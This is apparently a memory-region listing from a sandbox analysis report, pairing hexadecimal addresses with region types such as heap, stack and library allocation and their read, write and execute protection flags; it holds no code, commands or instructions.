|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
E440DFB000
|
stack
|
page read and write
|
||
|
24A5D000
|
trusted library allocation
|
page read and write
|
||
|
1D95B22E000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
1D957B4D000
|
heap
|
page read and write
|
||
|
3013000
|
trusted library allocation
|
page execute and read and write
|
||
|
2466C000
|
stack
|
page read and write
|
||
|
244CE000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
245E2000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1D957B46000
|
heap
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
223DE000
|
stack
|
page read and write
|
||
|
25130000
|
trusted library allocation
|
page read and write
|
||
|
21764EF0000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
89C0000
|
direct allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6990000
|
direct allocation
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
21764D22000
|
heap
|
page read and write
|
||
|
24A90000
|
trusted library allocation
|
page read and write
|
||
|
A63267E000
|
stack
|
page read and write
|
||
|
76A5000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
1D9594D5000
|
heap
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
3131000
|
heap
|
page read and write
|
||
|
1D95A13A000
|
trusted library allocation
|
page read and write
|
||
|
1D95B796000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
223F0000
|
heap
|
page read and write
|
||
|
244B0000
|
trusted library allocation
|
page read and write
|
||
|
25390000
|
trusted library allocation
|
page read and write
|
||
|
1D957AE0000
|
heap
|
page read and write
|
||
|
1D971A29000
|
heap
|
page read and write
|
||
|
2494D000
|
stack
|
page read and write
|
||
|
1D95A15A000
|
trusted library allocation
|
page read and write
|
||
|
245E2000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
24A53000
|
trusted library allocation
|
page read and write
|
||
|
1D957B51000
|
heap
|
page read and write
|
||
|
2456D000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
22240000
|
trusted library allocation
|
page execute and read and write
|
||
|
E4407FF000
|
stack
|
page read and write
|
||
|
E440AFD000
|
stack
|
page read and write
|
||
|
1D971CC0000
|
heap
|
page read and write
|
||
|
6B42000
|
heap
|
page read and write
|
||
|
24620000
|
heap
|
page execute and read and write
|
||
|
1D95A101000
|
trusted library allocation
|
page read and write
|
||
|
24A90000
|
trusted library allocation
|
page read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
1D9593D0000
|
trusted library allocation
|
page read and write
|
||
|
1D95A152000
|
trusted library allocation
|
page read and write
|
||
|
5C49000
|
trusted library allocation
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
3125000
|
heap
|
page read and write
|
||
|
1D957AA0000
|
trusted library allocation
|
page read and write
|
||
|
1D97199E000
|
heap
|
page read and write
|
||
|
23429000
|
trusted library allocation
|
page read and write
|
||
|
A63374E000
|
stack
|
page read and write
|
||
|
A632293000
|
stack
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
22080000
|
heap
|
page read and write
|
||
|
E440CFF000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
25350000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
298D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24730000
|
trusted library allocation
|
page read and write
|
||
|
2229A000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A63000
|
trusted library allocation
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
887B000
|
stack
|
page read and write
|
||
|
1D971940000
|
heap
|
page read and write
|
||
|
245EF000
|
heap
|
page read and write
|
||
|
8940000
|
direct allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
D1E4DFF000
|
stack
|
page read and write
|
||
|
21764CA9000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
24531000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
69D0000
|
direct allocation
|
page read and write
|
||
|
21764D42000
|
heap
|
page read and write
|
||
|
1D95B828000
|
trusted library allocation
|
page read and write
|
||
|
5C87000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
24542000
|
heap
|
page read and write
|
||
|
7EF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
22230000
|
direct allocation
|
page read and write
|
||
|
250EE000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
1D95A17A000
|
trusted library allocation
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
8990000
|
direct allocation
|
page read and write
|
||
|
1D95B5E6000
|
trusted library allocation
|
page read and write
|
||
|
1D959B40000
|
trusted library allocation
|
page read and write
|
||
|
1D957AC0000
|
trusted library allocation
|
page read and write
|
||
|
1D95A178000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
3193000
|
heap
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
247D0000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
A6323DF000
|
stack
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21766B92000
|
heap
|
page read and write
|
||
|
22190000
|
remote allocation
|
page read and write
|
||
|
30B0000
|
heap
|
page readonly
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
1D95B541000
|
trusted library allocation
|
page read and write
|
||
|
24500000
|
trusted library allocation
|
page read and write
|
||
|
21764D22000
|
heap
|
page read and write
|
||
|
4A27000
|
remote allocation
|
page execute and read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
1D971B33000
|
heap
|
page read and write
|
||
|
21764D6B000
|
heap
|
page read and write
|
||
|
C7C000
|
stack
|
page read and write
|
||
|
24730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
244BE000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
4BF7000
|
trusted library allocation
|
page read and write
|
||
|
29B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
trusted library section
|
page read and write
|
||
|
1D95B644000
|
trusted library allocation
|
page read and write
|
||
|
24A72000
|
trusted library allocation
|
page read and write
|
||
|
2456D000
|
heap
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
29A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
253A0000
|
trusted library allocation
|
page read and write
|
||
|
1D95B5BC000
|
trusted library allocation
|
page read and write
|
||
|
3029000
|
trusted library allocation
|
page read and write
|
||
|
24561000
|
heap
|
page read and write
|
||
|
1D959B2E000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
4C82000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
21764CCE000
|
heap
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
6A8E000
|
stack
|
page read and write
|
||
|
22098000
|
heap
|
page read and write
|
||
|
89D0000
|
direct allocation
|
page read and write
|
||
|
1D957AF0000
|
trusted library allocation
|
page read and write
|
||
|
4027000
|
remote allocation
|
page execute and read and write
|
||
|
21764D0E000
|
heap
|
page read and write
|
||
|
24730000
|
trusted library allocation
|
page read and write
|
||
|
8980000
|
direct allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
25370000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8387000
|
stack
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
6AC0000
|
heap
|
page read and write
|
||
|
1D971C52000
|
heap
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
8564000
|
heap
|
page read and write
|
||
|
24A0E000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
1D95B640000
|
trusted library allocation
|
page read and write
|
||
|
1D95B82C000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
1D959F9E000
|
trusted library allocation
|
page read and write
|
||
|
1D9594C0000
|
heap
|
page read and write
|
||
|
245D6000
|
heap
|
page read and write
|
||
|
1D971C46000
|
heap
|
page read and write
|
||
|
1D957B0E000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6B3F000
|
heap
|
page read and write
|
||
|
25370000
|
trusted library allocation
|
page read and write
|
||
|
A6327FE000
|
stack
|
page read and write
|
||
|
72AB000
|
stack
|
page read and write
|
||
|
22477000
|
trusted library allocation
|
page read and write
|
||
|
4D78000
|
trusted library allocation
|
page read and write
|
||
|
21764EFA000
|
heap
|
page read and write
|
||
|
1D959686000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
4B08000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
853D000
|
heap
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
21764D2F000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
89A0000
|
direct allocation
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
27BAC520000
|
heap
|
page read and write
|
||
|
A6329F7000
|
stack
|
page read and write
|
||
|
76E2000
|
heap
|
page read and write
|
||
|
21764CE2000
|
heap
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
1D971C79000
|
heap
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
6750000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
24A39000
|
trusted library allocation
|
page read and write
|
||
|
1D959490000
|
heap
|
page read and write
|
||
|
244C2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
27BAC1F0000
|
heap
|
page read and write
|
||
|
1D95A11B000
|
trusted library allocation
|
page read and write
|
||
|
79FC000
|
stack
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
6910000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1D971C5C000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
21764D4F000
|
heap
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D959829000
|
trusted library allocation
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
1D9719AD000
|
heap
|
page read and write
|
||
|
2202E000
|
stack
|
page read and write
|
||
|
25380000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
244B6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1D971CDC000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
93A0000
|
direct allocation
|
page execute and read and write
|
||
|
24A90000
|
trusted library allocation
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
21766B94000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
21764C30000
|
heap
|
page read and write
|
||
|
25130000
|
trusted library allocation
|
page read and write
|
||
|
21764D54000
|
heap
|
page read and write
|
||
|
5427000
|
remote allocation
|
page execute and read and write
|
||
|
23401000
|
trusted library allocation
|
page read and write
|
||
|
A63277E000
|
stack
|
page read and write
|
||
|
E44016A000
|
stack
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
1D97194F000
|
heap
|
page read and write
|
||
|
7DF4A5720000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
222D9000
|
stack
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
6B21000
|
heap
|
page read and write
|
||
|
1D959D78000
|
trusted library allocation
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
21764D42000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
24AA0000
|
trusted library allocation
|
page read and write
|
||
|
1D959601000
|
trusted library allocation
|
page read and write
|
||
|
7667000
|
heap
|
page read and write
|
||
|
6B8C000
|
heap
|
page read and write
|
||
|
7620000
|
heap
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
21764CEE000
|
heap
|
page read and write
|
||
|
6A20000
|
direct allocation
|
page read and write
|
||
|
6B36000
|
heap
|
page read and write
|
||
|
21764CFD000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
1D957BEA000
|
heap
|
page read and write
|
||
|
239E000
|
stack
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
69A7000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21764CF9000
|
heap
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6A10000
|
direct allocation
|
page read and write
|
||
|
21F90000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
21E2D000
|
stack
|
page read and write
|
||
|
780E000
|
stack
|
page read and write
|
||
|
21764CE9000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
trusted library section
|
page read and write
|
||
|
1D9594C3000
|
heap
|
page read and write
|
||
|
3042000
|
trusted library allocation
|
page read and write
|
||
|
21EAD000
|
stack
|
page read and write
|
||
|
21764D2F000
|
heap
|
page read and write
|
||
|
2F0D000
|
stack
|
page read and write
|
||
|
24567000
|
heap
|
page read and write
|
||
|
244E2000
|
trusted library allocation
|
page read and write
|
||
|
21764D42000
|
heap
|
page read and write
|
||
|
1D96960F000
|
trusted library allocation
|
page read and write
|
||
|
1D971B10000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
27BAC525000
|
heap
|
page read and write
|
||
|
2456D000
|
heap
|
page read and write
|
||
|
21764CED000
|
heap
|
page read and write
|
||
|
244D6000
|
trusted library allocation
|
page read and write
|
||
|
1D95B81A000
|
trusted library allocation
|
page read and write
|
||
|
4C05000
|
heap
|
page execute and read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
1D957AE5000
|
heap
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
1D971EF0000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21766840000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
249CE000
|
stack
|
page read and write
|
||
|
70AB000
|
stack
|
page read and write
|
||
|
1D971AE0000
|
heap
|
page execute and read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
3195000
|
heap
|
page read and write
|
||
|
21764EF5000
|
heap
|
page read and write
|
||
|
21764CEC000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
27BAC25B000
|
heap
|
page read and write
|
||
|
25130000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
1D9595F0000
|
heap
|
page execute and read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
21764D06000
|
heap
|
page read and write
|
||
|
8735000
|
trusted library allocation
|
page read and write
|
||
|
8596000
|
heap
|
page read and write
|
||
|
29A2000
|
trusted library allocation
|
page read and write
|
||
|
877C000
|
stack
|
page read and write
|
||
|
223E0000
|
trusted library allocation
|
page read and write
|
||
|
6B42000
|
heap
|
page read and write
|
||
|
7FB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
25090000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
21764CFE000
|
heap
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
29C0000
|
heap
|
page execute and read and write
|
||
|
25080000
|
trusted library allocation
|
page read and write
|
||
|
21764C80000
|
heap
|
page read and write
|
||
|
25337000
|
trusted library allocation
|
page read and write
|
||
|
1D971A0A000
|
heap
|
page read and write
|
||
|
78CD000
|
stack
|
page read and write
|
||
|
6B3D000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6B3F000
|
heap
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
25140000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
1D95B43C000
|
trusted library allocation
|
page read and write
|
||
|
3E60000
|
remote allocation
|
page execute and read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
A6326FC000
|
stack
|
page read and write
|
||
|
751F000
|
stack
|
page read and write
|
||
|
8A00000
|
direct allocation
|
page read and write
|
||
|
D1E4CFE000
|
unkown
|
page read and write
|
||
|
6B26000
|
heap
|
page read and write
|
||
|
7696000
|
heap
|
page read and write
|
||
|
1D95B800000
|
trusted library allocation
|
page read and write
|
||
|
21764CC2000
|
heap
|
page read and write
|
||
|
5C31000
|
trusted library allocation
|
page read and write
|
||
|
27BAC200000
|
heap
|
page read and write
|
||
|
1D957B90000
|
heap
|
page read and write
|
||
|
21766B9E000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
24630000
|
trusted library allocation
|
page read and write
|
||
|
2243F000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
22479000
|
trusted library allocation
|
page read and write
|
||
|
22436000
|
trusted library allocation
|
page read and write
|
||
|
A63287E000
|
stack
|
page read and write
|
||
|
6AC8000
|
heap
|
page read and write
|
||
|
1D957920000
|
heap
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
6B3D000
|
heap
|
page read and write
|
||
|
7737000
|
trusted library allocation
|
page read and write
|
||
|
21764CBE000
|
heap
|
page read and write
|
||
|
1D95B218000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
3040000
|
trusted library allocation
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
1D957A20000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1D9698F8000
|
trusted library allocation
|
page read and write
|
||
|
8970000
|
direct allocation
|
page read and write
|
||
|
6A00000
|
direct allocation
|
page read and write
|
||
|
21764D2C000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
B367000
|
direct allocation
|
page execute and read and write
|
||
|
4BF0000
|
trusted library allocation
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
1D9719AF000
|
heap
|
page read and write
|
||
|
24A87000
|
trusted library allocation
|
page read and write
|
||
|
E4404FE000
|
stack
|
page read and write
|
||
|
21764D22000
|
heap
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
303A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
1D95B5D0000
|
trusted library allocation
|
page read and write
|
||
|
221CE000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
1D971C10000
|
heap
|
page read and write
|
||
|
71AA000
|
stack
|
page read and write
|
||
|
A632BFE000
|
stack
|
page read and write
|
||
|
1D95B243000
|
trusted library allocation
|
page read and write
|
||
|
A63231E000
|
stack
|
page read and write
|
||
|
1D971C7E000
|
heap
|
page read and write
|
||
|
1D971A67000
|
heap
|
page execute and read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
88FC000
|
stack
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
24A62000
|
trusted library allocation
|
page read and write
|
||
|
A632B7E000
|
stack
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1D971CE4000
|
heap
|
page read and write
|
||
|
24A90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
4C21000
|
trusted library allocation
|
page read and write
|
||
|
21764D02000
|
heap
|
page read and write
|
||
|
77B0000
|
heap
|
page execute and read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
21766B90000
|
heap
|
page read and write
|
||
|
1D957B94000
|
heap
|
page read and write
|
||
|
4B4F000
|
stack
|
page read and write
|
||
|
76FC000
|
heap
|
page read and write
|
||
|
30DC000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
24569000
|
heap
|
page read and write
|
||
|
21764CDE000
|
heap
|
page read and write
|
||
|
6B7B000
|
heap
|
page read and write
|
||
|
5C21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
24A4D000
|
trusted library allocation
|
page read and write
|
||
|
21764CE3000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
21764CF4000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
23EE000
|
unkown
|
page read and write
|
||
|
842D000
|
stack
|
page read and write
|
||
|
726D000
|
stack
|
page read and write
|
||
|
23463000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24730000
|
heap
|
page read and write
|
||
|
24A61000
|
trusted library allocation
|
page read and write
|
||
|
2F69000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764D66000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
1D969601000
|
trusted library allocation
|
page read and write
|
||
|
6B01000
|
heap
|
page read and write
|
||
|
3014000
|
trusted library allocation
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
8A20000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
69C0000
|
direct allocation
|
page read and write
|
||
|
8A10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D969908000
|
trusted library allocation
|
page read and write
|
||
|
6B42000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2990000
|
trusted library allocation
|
page read and write
|
||
|
6A30000
|
direct allocation
|
page read and write
|
||
|
716D000
|
stack
|
page read and write
|
||
|
25130000
|
trusted library allocation
|
page read and write
|
||
|
69F0000
|
direct allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
direct allocation
|
page read and write
|
||
|
21764CA8000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
E440BFE000
|
stack
|
page read and write
|
||
|
29B2000
|
trusted library allocation
|
page read and write
|
||
|
2220F000
|
stack
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
25370000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
2458B000
|
heap
|
page read and write
|
||
|
22401000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
2235E000
|
stack
|
page read and write
|
||
|
2456D000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
1D957A00000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
27BAC220000
|
heap
|
page read and write
|
||
|
1D957AD0000
|
heap
|
page readonly
|
||
|
6B7E000
|
heap
|
page read and write
|
||
|
301D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
A632A79000
|
stack
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764D02000
|
heap
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
6B7B000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
7531000
|
heap
|
page read and write
|
||
|
2983000
|
trusted library allocation
|
page execute and read and write
|
||
|
21764CDA000
|
heap
|
page read and write
|
||
|
24AAD000
|
stack
|
page read and write
|
||
|
22090000
|
heap
|
page read and write
|
||
|
24559000
|
heap
|
page read and write
|
||
|
24A8E000
|
trusted library allocation
|
page read and write
|
||
|
846F000
|
stack
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
295C000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
8950000
|
direct allocation
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
22220000
|
direct allocation
|
page read and write
|
||
|
7639000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764D42000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
4A5C000
|
stack
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
21764D0F000
|
heap
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
21764EFE000
|
heap
|
page read and write
|
||
|
52C8000
|
trusted library allocation
|
page read and write
|
||
|
21764D02000
|
heap
|
page read and write
|
||
|
29B0000
|
trusted library allocation
|
page read and write
|
||
|
244A0000
|
trusted library allocation
|
page read and write
|
||
|
1D959C99000
|
trusted library allocation
|
page read and write
|
||
|
21764D03000
|
heap
|
page read and write
|
||
|
89F0000
|
direct allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
21EEC000
|
stack
|
page read and write
|
||
|
